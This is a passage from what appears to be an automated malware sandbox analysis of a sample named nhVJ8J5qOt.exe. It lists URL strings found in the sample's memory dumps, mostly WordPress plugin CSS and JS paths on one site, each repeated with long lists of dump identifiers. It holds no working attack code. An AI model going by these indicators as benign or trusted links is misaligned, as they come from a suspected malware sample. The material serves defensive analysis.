nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 